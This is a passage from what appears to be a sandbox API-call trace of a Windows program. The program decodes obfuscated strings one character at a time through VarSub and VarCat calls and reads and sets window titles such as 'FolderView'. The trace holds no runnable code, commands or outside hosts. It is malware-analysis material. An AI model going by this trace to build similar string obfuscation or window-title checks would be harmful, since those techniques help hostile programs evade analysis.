returned 0x0 [0202.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.250] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0202.250] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.251] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0202.252] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.252] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.253] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.254] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.254] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.255] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0202.255] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.256] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.256] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.257] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.258] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.259] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0202.259] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.260] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.260] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.261] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0202.261] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.262] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0202.262] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.263] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.263] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.264] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0202.264] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.265] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0202.265] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0202.265] GetForegroundWindow () returned 0x1011a [0202.266] GetLastError () returned 0x0 [0202.266] SysStringLen (param_1=" ") returned 0xff [0202.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0202.266] SysStringLen (param_1=" ") returned 0xff [0202.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0202.266] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0202.267] GetLastError () returned 0x0 [0202.267] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0202.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0202.267] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0202.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0202.268] SysStringLen (param_1="Fo") returned 0x2 [0202.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fo", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fo", lpUsedDefaultChar=0x0) returned 3 [0202.268] SetWindowTextA (hWnd=0x103c4, lpString="Fo") returned 1 [0202.268] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0202.268] GetFocus () returned 0x0 [0202.269] lstrlenA (lpString="Fo") returned 2 [0202.269] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0202.269] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="De") returned 2 [0202.269] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0202.269] GetFocus () returned 0x0 [0202.269] lstrcmpA (lpString1="De", lpString2="Fo") returned -1 [0202.269] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0202.269] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0202.271] IsWindow (hWnd=0x103c4) returned 1 [0202.271] IsWindow (hWnd=0x103c4) returned 1 [0202.272] IsWindow (hWnd=0x103c4) returned 1 [0202.272] IsWindow (hWnd=0x103c4) returned 1 [0202.272] GetFocus () returned 0x0 [0202.321] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0202.321] GetFocus () returned 0x0 [0202.321] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0202.321] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0202.321] GetFocus () returned 0x0 [0202.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0202.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Fo") returned 3 [0202.322] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0202.322] VarBstrCmp (bstrLeft="Fo", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0202.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.323] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0202.324] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.324] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0202.325] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.326] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0202.326] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.327] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0202.327] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.328] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0202.328] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.329] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0202.329] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.330] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0202.331] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.331] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.332] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.333] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0202.333] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.334] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0202.334] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.335] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0202.336] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.337] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0202.337] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.338] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0202.338] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.339] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0202.339] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.340] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0202.341] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.341] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0202.342] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0202.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0202.342] VarSub (in: 